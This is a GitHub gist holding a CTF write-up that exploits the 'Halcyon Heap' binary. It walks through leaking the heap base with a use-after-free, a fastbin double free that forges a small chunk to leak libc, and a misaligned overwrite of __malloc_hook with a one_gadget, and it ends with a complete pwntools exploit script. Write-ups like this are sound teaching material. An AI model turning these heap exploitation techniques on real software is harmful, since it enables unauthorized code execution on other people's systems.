Skip to content

Instantly share code, notes, and snippets.

@slick1015
Last active April 13, 2019 11:47
Show Gist options
  • Star 2 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save slick1015/8b64b8e6e44d444e8b9d32e2651071fb to your computer and use it in GitHub Desktop.
Save slick1015/8b64b8e6e44d444e8b9d32e2651071fb to your computer and use it in GitHub Desktop.

Halcyon Heap

200 points

Welcome to the sunny land of Halcyon Heap, where the fastbins are fast and the smallbins don't exist! (libc)

Hint: If you want smallbins done right you do it on your own.

Intro

Before we even run the binary let's check the security features with checksec:

$ checksec ./halcyon_heap
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled

Right away what sticks out is that this binary is PIE enabled.

What does the binary look like when we run it?

Welcome to Halcyon Heap!
1. Sice a deet
2. Observe a deet
3. Brutally destroy a deet
4. Exit
>

Ah, it seems to be a heap challenge.

After some reverse engineering the different menu options can be described in full.

  1. malloc() a message of any length up to and including 0x78. The message is read through STDIN using read(). A max of 16 messages can be created.
  2. write() out the contents of a message based on its index.
  3. free() a message based on its index.
  4. exit(0)

A couple bugs arise because of this binary's functionality:

  • UAF - a message can be read after being free()'d
  • Double free - the free() menu option doesn't check if the message has already been free()'d

Goals

The overarching goal of this binary is to launch a shell on a remote server running this application to then read the flag. Based on this goal we can devise a plan to achieve a remote shell:

  • Leak the heap base
  • Use the leaked heap base to create a fake small chunk
  • Free the small chunk to get a pointer to the main arena, thus leaking a libc address
  • Overwrite __malloc_hook with a one_gadget

All of these steps can be achieved through known heap exploitation techniques but what makes this challenge unique are the constraints:

  • Fast bin size allocations (makes leaking libc harder!)
  • 16 allocations total
  • Main program is PIE and full RELRO (no GOT overwrite!)

Setup

To get start we can create a framework around the pwnable using pwntools. My boilerplate setup for pwntools looks a bit like this:

from pwn import *
import struct

context.binary = "./halcyon_heap"
context.terminal = "/bin/bash"

e = ELF("./halcyon_heap")
libc = ELF("./libc.so.6")
p = e.process(env={"LD_PRELOAD": libc.path})
# gdb.attach(p)

@atexception.register
def handler():
    log.failure(p.recvall())

p.readuntil("> ")

Next, to interact with the binary we can create some helper functions like this:

next_deet_index = 0

def create_deet(size, value):
    global next_deet_index
    assert len(value) <= size
    p.sendline("1")
    p.sendlineafter("> ", str(size))
    p.sendlineafter("> ", value)
    p.readuntil("> ")
    result = next_deet_index
    next_deet_index += 1
    return result

def delete_deet(idx):
    p.sendline("3")
    p.sendlineafter("> ", str(idx))
    p.readuntil("> ")

def view_deet(idx):
    p.sendline("2")
    p.sendlineafter("> ", str(idx))
    res = p.readuntil("> ")
    end = res.find("Welcome to Halcyon")
    deet = res[0:end]
    log.info("deet " + chr(ord("a") + idx) + ":" )
    print hexdump(deet)
    return deet

Leaking the Heap Base

To leak the heap base we can abuse our first bug, a UAF. To do this we make two allocations that are of the same fast bin index, let's say 64 byte allocations named a and b. If we free a then b, b will have its fwd pointer set to the start of a's chunk header, which is also the heap base. If we then read the first uint64_t off of b (aka its fwd pointer) we get the heap base. This is what it looks like in code:

a = create_deet(64, "")
b = create_deet(64, "")

delete_deet(a)
delete_deet(b)

res = view_deet(b)
HEAP_BASE = struct.unpack_from("Q", res, 0)[0]
log.info("HEAP_BASE: " + hex(HEAP_BASE))

Creating a Fake Small Chunk

To create a fake chunk we must first overwrite the header of an existing chunk to set the size value to be larger than 0x80. However, what is tricky with this is that with the new size the chunk must still meet all integrity checks done by free().

To overwrite the header of an existing chunk we will make use of the double free bug we found earlier. For malloc() to keep small allocations fast it will take the first chunk off the fast bin free list that meets the size requested by malloc(). This functionality is called "first fit" and can easily be tested and proven in a small C program. An abuse of this functionality can be demonstrated in the following code:

a = create_deet(64, "")
b = create_deet(64, "")

# add `a` to the free list
delete_deet(a)
# free a different allocation inbetween to avoid double free detection
# add `b` to the free list
delete_deet(b)
# add `a` to the free list
delete_deet(a)

# now the free list looks like this:
# a -> b -> a

# our next allocation will be where `a` was 
# by initializing the content of `a` with a value where the `fwd` 
# pointer would be we can make malloc return an arbitrary pointer
c = create_deet(64, p64(0xdeadbeefdeadbeef))
# this allocation will be where `b` was
d = create_deet(64, "")
# this allocation will be where `a` was
# since the `a` allocation had its `fwd` pointer set to 0xdeadbeefdeadbeef
# the next pointer returned by `malloc()` will be this arbitrary pointer
e = create_deet(64, "")

# this allocation will be at 0xdeadbeefdeadbeef but since that
# isn't a valid address it will segfault
f = create_deet(64, "")

Now putting it all together we can start overwriting a chunk header with our arbitrary pointer fast bin attack. In this example we will overwrite the header of chunk b to set the size of it to 0xa0.

a = create_deet(64, "")
b = create_deet(64, "")

delete_deet(a)
delete_deet(b)

# using a UAF we can read `b`'s fwd pointer to leak the heap base
res = view_deet(b)
HEAP_BASE = struct.unpack_from("Q", res, 0)[0]
log.info("HEAP_BASE: " + hex(HEAP_BASE))

delete_deet(a)

# we set the arbitrary malloc return pointer to point to
# the user data portion of the `a` chunk
# the 0x51 is also there to act as the size for the fastbin
# chunk
# we got this size by doing 64 + 0x10 | 1 (we set the first bit
# # so that the prev_inuse flag is set on the chunk which is required
# for all fast chunks)
c = create_deet(64, p64(HEAP_BASE + 0x10) + p64(0x51)) # equivalent to `a`
d = create_deet(64, "") # equivalent to `b`
e = create_deet(64, "") # equivalent to `a`

# this is our arbitrary chunk
# the last 0x10 bytes of this chunk overlap with the 0x10 byte
# chunk header of the chunk after it, chunk `b`
# by overwriting the header of chunk `b` we can set the size of
# chunk `b` to small chunk size, in this case we using size 0xa0
f = create_deet(64, p64(0) * 7 + p64(0xa0))

Q: Why do we want b to be a small chunk?

A: When you free a small chunk it's fwd pointer is set to somewhere in libc, the main arena. Thus freeing a small chunk can be used to leak a libc address that can be used to calculate the libc base. We use a small chunk rather than a fast chunk because this doesn't happen normally with fast chunks.

Q: What happens when we try to free chunk b now?

A: Try it for yourself and see! Or, for the lazy people this is what is printed:

[-] *** Error in `halcyon_heap': double free or corruption (!prev): 0x00007ffff2abe060 ***

Freeing the Fake Small Chunk, Leaking libc

Seemingly we are now failing an integrity check with our fake chunk. Here you can see some common integrity check messages and their respective reasons. It seems like the next chunk in memory's prev_inuse bit isn't set. We can resolve this by making another allocation and creating a fake chunk header that has its prev_inuse bit set. Continuing with the last bit of code we can write the following:

# this allocation will create a fake chunk in memory at an offset
# that is at b + b.size
# the purpose of this chunk is to resolve the 
# "double free or corruption (!prev)" error
g = create_deet(0x78, p64(0) * 9 + p64(0x51))

delete_deet(b)

Now we fail a new integrity check:

[-] *** Error in `halcyon_heap': corrupted size vs. prev_size: 0x00007fffe24c8050 ***

After looking up this error, we can see that this is caused by the fact that our fake chunk header in g has an incorrect prev_size. We can apply the following fix to resolve this:

g = create_deet(0x78, p64(0) * 8 + p64(0xa0) + p64(0x51))

Now free()ing chunk b will work... right? RIGHT???

Sadly, no. We fail a new integrity check:

[-] *** Error in `halcyon_heap': corrupted double-linked list: 0x00007fffc3436050 ***

Here, we are encountering the infamous unlink() macro integrity check. The resolution for this is a simple change of a previous line:

# for when we free our corrupted chunk, `b`, we want its `fwd` and
# `bck` pointers to be correct for an `unlink()` check
d = create_deet(64, p64(HEAP_BASE + 0x50) + p64(HEAP_BASE + 0x50)) # equivalent to `b`

Of course it isn't over yet, we get yet another error from free()ing b:

[-] *** Error in `halcyon_heap': corrupted size vs. prev_size: 0x00007fffbf4880f0 ***

Hmmmm, seems familiar, right? It seems that our fake chunk we made in our g chunk is getting checked too and doesn't have a valid chunk after it in memory. This can be resolved by setting the size value in the header of the fake chunk so that the unlink() macro thinks the wilderness is next. The necessary modification is as follows:

# makes unlink() think that the wilderness is after this chunk
# so it doesn't throw the "corrupted size vs. prev_size" error
g = create_deet(0x78, p64(0) * 8 + p64(0xa0) + p64(0x31))

Now, after all of these errors we can finally free chunk b, the chunk we corrupted into being a small chunk. Because b is a small chunk and freed successfully, we can finally taste the fruits of our labor. By reading b we get a pointer into libc! The following code demonstrates this:

# free() chunk `b` so that it gets added to the unsorted free list
# and has a pointer into libc
delete_deet(b)

# read the pointer into libc and calculate libc base
res = view_deet(b)
MAIN_ARENA = struct.unpack_from("Q", res, 0)[0]
log.info("MAIN_ARENA: " + hex(MAIN_ARENA))
LIBC_BASE = MAIN_ARENA - 0x3c4b78
log.info("LIBC_BASE: " + hex(LIBC_BASE))

Achieving Code Execution Through Arbitrary Write

That trick we used earlier to have malloc return an arbitrary pointer, maybe that can be used again to overwrite a value in libc to control RIP. Our prime candidate in being overwritten is __malloc_hook. It's easy for us to trigger and is inside libc!

Let's put this to the test in the following code to see if we can overwrite __malloc_hook with a one_gadget:

# a gadget that I found works with this exploit chain
# gotten from one_gadget
ONE_GADGET_OFFSET = 0xf1147
# this is necessary to find the area in memory we want to overwrite
__malloc_hook = libc.symbols["__malloc_hook"]

# same old, same old exploit used above to have malloc return an
# arbitrary pointer
h = create_deet(0x10, "")
i = create_deet(0x10, "")

delete_deet(h)
delete_deet(i)
delete_deet(h)

# have malloc return the address of __malloc_hook
j = create_deet(0x10, p64(LIBC_BASE + __malloc_hook))
k = create_deet(0x10, "")
l = create_deet(0x10, "")
# overwrite __malloc_hook to point to our gadget
m = create_deet(0x10, p64(LIBC_BASE + ONE_GADGET_OFFSET))

Oh no, not another error...

[-] *** Error in `halcyon_heap': malloc(): memory corruption (fast): 0x00007fbdbdff4b20 ***

Seems like we are hitting another one of those annoying integrity checks. malloc() doesn't want to return the address of __malloc_hook because it isn't a valid chunk, what it thinks is the header of it doesn't have a valid fast bin size. Let's look through gdb and see if there are any areas nearby __malloc_hook that are possible candidates for being a valid fast chunk header. Here is what shows up several bytes before __malloc_hook:

gef➤  x/40bx &__malloc_hook-8
0x7f4159df4af0: 0x60    0x32    0xdf    0x59    0x41    0x7f    0x00    0x00
0x7f4159df4af8: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
0x7f4159df4b00 <__memalign_hook>:       0x20    0x5e    0xab    0x59    0x41    0x7f    0x00    0x00
0x7f4159df4b08 <__realloc_hook>:        0x00    0x5a    0xab    0x59    0x41    0x7f    0x00    0x00
0x7f4159df4b10 <__malloc_hook>: 0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00

What we are looking for is a uint64_t in the range of [0x20, 0x80] to be a valid fast bin size. See it yet? I'll give a hint: it isn't aligned to an 8 byte boundary. At 0x7f4159df4af5 there is a 0x7f followed by several zeroes, this can be interpreted in little endian as 0x000000000000007f. This is a valid fast bin size!

To take advantage of this finding we can make some changes to have the returned pointer be slightly above __malloc_chunk so that it is valid and then offset our write so that it properly overwrites __malloc_chunk to be our one_gadget. Another change that must be made is the size of our allocations for this part of the exploit, 0x10 won't cut it anymore. We are upgrading our allocations to size 0x68 so when the header gets added they will be 0x78 which lands in the same fast bin as 0x7f. The following changes look like this in our code:

# same old, same old exploit used above to have malloc return an
# arbitrary pointer
h = create_deet(0x68, "")
i = create_deet(0x68, "")

delete_deet(h)
delete_deet(i)
delete_deet(h)

# have malloc return the address of __malloc_hook
# offset by -0x23 so that the pointer is a valid fast chunk
j = create_deet(0x68, p64(LIBC_BASE + __malloc_hook - 0x23))
k = create_deet(0x68, "")
l = create_deet(0x68, "")
# overwrite __malloc_hook to point to our gadget
m = create_deet(0x68, "\x00" * 0x13 + p64(LIBC_BASE + ONE_GADGET_OFFSET))

Now everything is ready! Next time malloc() is called our gadget will be jumped to and a shell will open! The very final bit of our exploit script is the following:

# trigger __malloc_hook by causing the binary to call malloc()
p.sendline("1")
p.sendlineafter("> ", "1")

p.interactive()

A very satisfying finale to a very frustrating exploit chain.

Takeaways

There are a couple valuable things I've learned from this challenge about heap exploitation:

  • Libc can be leaked through freeing a small chunk.
  • __malloc_hook and __free_hook are great targets for getting arbitrary code execution when a binary is PIE enabled and you have a leak for libc.
  • Fast bin attack to have malloc() return an arbitrary pointer can take advantage of a misaligned address to be a valid chunk.
  • Even if you are restricted to fast bins, a chunk can be corrupted into being any bin necessary.

Final Script

Below is the final exploit script. It's quite a beast compared to most high school CTF challenge exploit scripts.

from pwn import *
import struct

context.binary = "./halcyon_heap"
context.terminal = "/bin/bash"

e = ELF("./halcyon_heap")
libc = ELF("./libc.so.6")
p = e.process(env={"LD_PRELOAD": libc.path})
# gdb.attach(p)

@atexception.register
def handler():
    log.failure(p.recvall())

p.readuntil("> ")

next_deet_index = 0

def create_deet(size, value):
    global next_deet_index
    assert len(value) <= size
    p.sendline("1")
    p.sendlineafter("> ", str(size))
    p.sendlineafter("> ", value)
    p.readuntil("> ")
    result = next_deet_index
    next_deet_index += 1
    return result

def delete_deet(idx):
    p.sendline("3")
    p.sendlineafter("> ", str(idx))
    p.readuntil("> ")

def view_deet(idx):
    p.sendline("2")
    p.sendlineafter("> ", str(idx))
    res = p.readuntil("> ")
    end = res.find("Welcome to Halcyon")
    deet = res[0:end]
    log.info("deet " + chr(ord("a") + idx) + ":" )
    print hexdump(deet)
    return deet

a = create_deet(64, "")
b = create_deet(64, "")

delete_deet(a)
delete_deet(b)

# using a UAF we can read `b`'s fwd pointer to leak the heap base
res = view_deet(b)
HEAP_BASE = struct.unpack_from("Q", res, 0)[0]
log.info("HEAP_BASE: " + hex(HEAP_BASE))

delete_deet(a)

# we set the arbitrary malloc return pointer to point to
# the user data portion of the `a` chunk
# the 0x51 is also there to act as the size for the fastbin
# chunk
# we got this size by doing 64 + 0x10 | 1 (we set the first bit
# # so that the prev_inuse flag is set on the chunk which is required
# for all fast chunks)
c = create_deet(64, p64(HEAP_BASE + 0x10) + p64(0x51)) # equivalent to `a`
# for when we free our corrupted chunk, `b`, we want its `fwd` and
# `bck` pointers to be correct for an `unlink()` check
d = create_deet(64, p64(HEAP_BASE + 0x50) + p64(HEAP_BASE + 0x50)) # equivalent to `b`
e = create_deet(64, "") # equivalent to `a`

# this is our arbitrary chunk
# the last 0x10 bytes of this chunk overlap with the 0x10 byte
# chunk header of the chunk after it, chunk `b`
# by overwriting the header of chunk `b` we can set the size of
# chunk `b` to small chunk size, in this case we using size 0xd0
f = create_deet(64, p64(0) * 7 + p64(0xa0))

# this allocation will create a fake chunk in memory at an offset
# that is at b + b.size
# the purpose of this chunk is to resolve the 
# "double free or corruption (!prev)" error
# we also set the prev_size to 0xa0 to resolve the
# "corrupted size vs. prev_size" error
# having the fake chunk be size 0x31 is important because this
# makes unlink() think that the wilderness is after this chunk
# so it doesn't throw the "corrupted size vs. prev_size" error
g = create_deet(0x78, p64(0) * 8 + p64(0xa0) + p64(0x31))

# free() chunk `b` so that it gets added to the unsorted free list
# and has a pointer into libc
delete_deet(b)

# read the pointer into libc and calculate libc base
res = view_deet(b)
MAIN_ARENA = struct.unpack_from("Q", res, 0)[0]
log.info("MAIN_ARENA: " + hex(MAIN_ARENA))
# subtract 0x3c4b78 to get the base of libc
# this value was found by subtracting the libc base found using
# gdb from the value in MAIN_ARENA
LIBC_BASE = MAIN_ARENA - 0x3c4b78
log.info("LIBC_BASE: " + hex(LIBC_BASE))

# a gadget that I found works with this exploit chain
# gotten from one_gadget
ONE_GADGET_OFFSET = 0xf1147
# this is necessary to find the area in memory we want to overwrite
__malloc_hook = libc.symbols["__malloc_hook"]

# same old, same old exploit used above to have malloc return an
# arbitrary pointer
h = create_deet(0x68, "")
i = create_deet(0x68, "")

delete_deet(h)
delete_deet(i)
delete_deet(h)

# have malloc return the address of __malloc_hook
# offset by -0x23 so that the pointer is a valid fast chunk
j = create_deet(0x68, p64(LIBC_BASE + __malloc_hook - 0x23))
k = create_deet(0x68, "")
l = create_deet(0x68, "")
# overwrite __malloc_hook to point to our gadget
m = create_deet(0x68, "\x00" * 0x13 + p64(LIBC_BASE + ONE_GADGET_OFFSET))

# trigger __malloc_hook by causing the binary to call malloc()
p.sendline("1")
p.sendlineafter("> ", "1")

p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment